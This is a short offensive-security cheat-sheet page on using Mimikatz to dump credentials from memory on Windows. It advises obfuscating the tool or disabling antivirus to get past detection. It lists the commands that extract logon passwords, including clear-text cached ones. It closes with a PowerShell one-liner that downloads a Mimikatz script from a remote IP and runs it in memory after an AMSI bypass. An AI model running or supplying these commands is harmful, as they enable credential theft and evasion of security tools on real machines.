search

Mimikatz

hashtag
Overview

Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable or turning off AV is your best bet for using it

hashtag
Running Mimikatz

hashtag
Inside of an Administrator shell

mimikatz.exe
privilege::debug                - enables all other attacks
sekurlsa::logonPasswords        - can show plaintext passwords saved in credman
circle-info

The credman passwords appear in clear text because when a network drive is mapped using the Connect using different credentials option, it is cached into credman as clear-text.

hashtag
Mimikatz.ps1

Run in memory after amsi bypass

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')

PreviousGPP / cPassword AttacksNextmisc

Last updated